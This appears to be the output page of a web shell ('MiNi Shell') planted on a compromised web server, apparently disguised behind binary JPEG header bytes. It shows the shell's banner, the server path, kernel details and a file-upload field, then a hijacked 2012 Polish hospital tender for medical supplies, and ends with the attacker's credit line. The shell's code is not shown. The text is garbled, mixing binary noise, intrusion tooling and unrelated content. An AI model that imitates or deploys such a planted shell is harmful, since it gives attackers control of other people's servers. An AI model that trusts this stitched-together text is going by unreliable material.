JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121003/378576-N-2012.html

<p class="kh_header"><b>Radom: Zakup i dostawa drobnego sprzętu medycznego oraz produktów medycznych 
dla potrzeb Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 378576 - 2012; data zamieszczenia: 03.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa drobnego sprzętu medycznego oraz produktów medycznych 
dla potrzeb Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 - Materiały wiskoelastyczne:
Lp.	Nazwa. 	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk
/ ilość ml.
1.	Kohezyjny preparat wiskoelastyczny do zabiegu operacji zaćmy zawierający 1 ampułkostrzykawkę, o poj.0,85-1ml z 1-1,4% hialuronianem sodu	- 1200 szt.
2.	Dyspersyjny preparat wiskoelastyczny do zabiegu operacji zaćmy zawierający 1 ampułkostrzykawkę poj.0,5ml lub 1 ml z mieszaniną 3% hialuronianu sodu i 4% siarczanu chondroityny	- 400 ml.

Część 2 - Półautomatyczna igła do biopsji:
Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Półautomatyczna igła do biopsji tkanek miekkich 14G x 150mm, możliwość pobrania bioptatu na różnych długościach, odłączona kaniula z nasadką luer - lock, skala w centymetrach na igle, przesuwany ogranicznik w kształcie walca, nasadka kaniuli pozwalająca na uzyskanie bioptatu bez konieczności wyciagania kaniuli	- 40 szt.

Część 3 - Części do aparatu do reutylizacji dializatorów:
Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Łącznik linni krwi do aparatu do reutylizacji dializatorów	- 60 szt.
2.	Gniazdo linii krwi do aparatu do reutylizacji dializatorów	- 30 szt.
Zamawiający wymaga, aby w/w części były kompatybilne z aparatem do reutylizacji dializatorów: Renatron firmy Dutchmed - PA100.

Część 4 - Końcówki tnące do urządzenia:
Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Końcówki tnące niezbędne do wykonywania zabiegów z zakresu ortognatyki:
a) końcówka tnąca zagięta pod kątem 120° o grubości 0,75 mm, 
     część pracująca 5 ząbkowa 	- 6 szt.
	b) końcówka tnąca zagięta pod kątem 120° o grubości 0,55 mm - 2 szt.
Zamawiający wymaga, aby w/w końcówki tnące były kompatybilne z urządzeniem Piezosurgery firmy Mectron.

Część 5 - Okłady żelowe:
Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Okłady żelowe duże niezbędne do postępowania pooperacyjnego 
po endoprotezoplastyce stawów kolanowych, zabiegach artroskopowych oraz urazach stawów kolanowych, rozmiar 28x34cm +/- 5cm, materiał odporny na niskie temp., elastyczny, materiał foliowy - 60 szt.

Część 6 - Masa Fango:
Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość kg/ rolka.
1.	Masa Fango. W skład masy wchodzą m.in.: łupki wulkaniczne typu Fango, parafina. Jest to rodzaj związku mineralnego pochodzenia wulkanicznego - 240 kg.
2.	Rolka folii do masy Fango, długość 1000 m, szerokość 65-66 cm, grubość 15 mikrometrów	- 8 rolek.
Zamawiający wymaga, aby w/w towar był kompatybilny z cieplarką typu F 40 i C 14 firmy Meden-Inmed.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.21.00-8, 33.16.20.00-3, 33.19.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał dostawy oferowanego towaru:
dla części nr 1 - Materiały wiskoelastyczne na kwotę min. 100.000,00 PLN,
dla części nr 2 - Półautomatyczna igła do biopsji na kwotę min. 1.000,00PLN,
dla części nr 3 - Części do aparatu do reutylizacji dializatorów na kwotę min. 1.000,00 PLN,
dla części nr 4 - Końcówki tnące do urządzenia na kwotę min. 2.000,00 PLN,
dla części nr 5 - Okłady żelowe na kwotę min. 2.000,00 PLN,
dla części nr 6 - Masa Fango na kwotę min. 5.000,00 PLN.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełniają łącznie.
W przypadku gdy w wykazie zamówień przedstawionym przez Wykonawcę rozliczenia między wykonawca a zamawiającym za wykonanie zamówienia zostało dokonane w innej walucie niż w złotych polskich, wykonawca (dla celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż złoty polski na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli kursów średnich walut obcych Narodowego Banku Polskiego (www.nbp.pl) na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych tj. 2012.10.03
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) w zakresie potwierdzenia spełniania warunku określonego w pkt. 9.1.2.a) - dokumenty potwierdzające dopuszczenie oferowanych wyrobów medycznych 
do obrotu i używania tj.: wpis do rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania lub Zgłoszenie wyrobu do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Prezesa Urzędu), o którym mowa w art. 58 ustawy lub Powiadomienie Prezesa Urzędu, o którym mowa w art. 59 ustawy lub deklaracja zgodności dla oferowanego wyrobu lub deklaracja zgodności dla oferowanego wyrobu wraz z certyfikatem zgodności, lub oświadczenie o braku obowiązku posiadania wyżej wymienionych dokumentów.
b) w zakresie potwierdzenia spełniania warunku określonego w pkt. 9.1.2.b) - oświadczenie o braku obowiązku posiadania dokumentu opisanego w pkt. 9.3.2.a), dla produktów niekwalifikowanych jako wyrób medyczny, wskazujące konkretnie na te pozycje</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty tj.
- wpis do KRS lub Ewidencji Działalności Gospodarczej - które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę lub
- pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.   Wypełniony formularz oferty,
3.   Wypełniony formularz cenowy/ specyfikacja techniczna - zgodnie z oferowaną częścią</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
b)	Ceny jednostkowe brutto mogą również ulec zmianie po upływie roku obowiązywania umowy o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem roku obowiązywania umowy,
c)	Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy lub zmiana statusu prawnego stron umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny przy ul. Lekarskiej 4 w Radomiu, w pok. 308 lub 313 /Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia/, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny przy ul. Lekarskiej 4 w Radomiu, w pok. 308 lub 313 /Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia/, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1 - Materiały wiskoelastyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa. 	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk/ ilość ml.
1.	Kohezyjny preparat wiskoelastyczny do zabiegu operacji zaćmy zawierający 1 ampułkostrzykawkę, o poj.0,85-1ml z 1-1,4% hialuronianem sodu	- 1200 szt.
2.	Dyspersyjny preparat wiskoelastyczny do zabiegu operacji zaćmy zawierający 1 ampułkostrzykawkę poj.0,5ml lub 1 ml z mieszaniną 3% hialuronianu sodu i 4% siarczanu chondroityny	- 400 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Półautomatyczna igła do biopsji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Półautomatyczna igła do biopsji tkanek miekkich 14G x 150mm, możliwość pobrania bioptatu na różnych długościach, odłączona kaniula z nasadką luer - lock, skala w centymetrach na igle, przesuwany ogranicznik w kształcie walca, nasadka kaniuli pozwalająca na uzyskanie bioptatu bez konieczności wyciagania kaniuli - 40 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Części do aparatu do reutylizacji dializatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Łącznik linni krwi do aparatu do reutylizacji dializatorów	- 60 szt.
2.	Gniazdo linii krwi do aparatu do reutylizacji dializatorów	- 30 szt.
Zamawiający wymaga, aby w/w części były kompatybilne z aparatem do reutylizacji dializatorów: Renatron firmy Dutchmed - PA100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Końcówki tnące do urządzenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Końcówki tnące niezbędne do wykonywania zabiegów z zakresu ortognatyki:
a) końcówka tnąca zagięta pod kątem 120° o grubości 0,75 mm, 
     część pracująca 5 ząbkowa 	- 6 szt.
	b) końcówka tnąca zagięta pod kątem 120° o grubości 0,55 mm	- 2 szt.
Zamawiający wymaga, aby w/w końcówki tnące były kompatybilne z urządzeniem Piezosurgery firmy Mectron.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Okłady żelowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość sztuk.
1.	Okłady żelowe duże niezbędne do postępowania pooperacyjnego 
po endoprotezoplastyce stawów kolanowych, zabiegach artroskopowych oraz urazach stawów kolanowych, rozmiar 28x34cm +/- 5cm, materiał odporny na niskie temp., elastyczny, materiał foliowy - 60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Masa Fango.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa.	Zapotrzebowanie orientacyjne na okres 2 lat / ilość kg/ rolka.
1.	Masa Fango. W skład masy wchodzą m.in.: łupki wulkaniczne typu Fango, parafina. Jest to rodzaj związku mineralnego pochodzenia wulkanicznego - 240 kg.
2.	Rolka folii do masy Fango, długość 1000 m, szerokość 65-66 cm, grubość 15 mikrometrów	- 8 rolek.
Zamawiający wymaga, aby w/w towar był kompatybilny z cieplarką typu F 40 i C 14 firmy Meden-Inmed.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com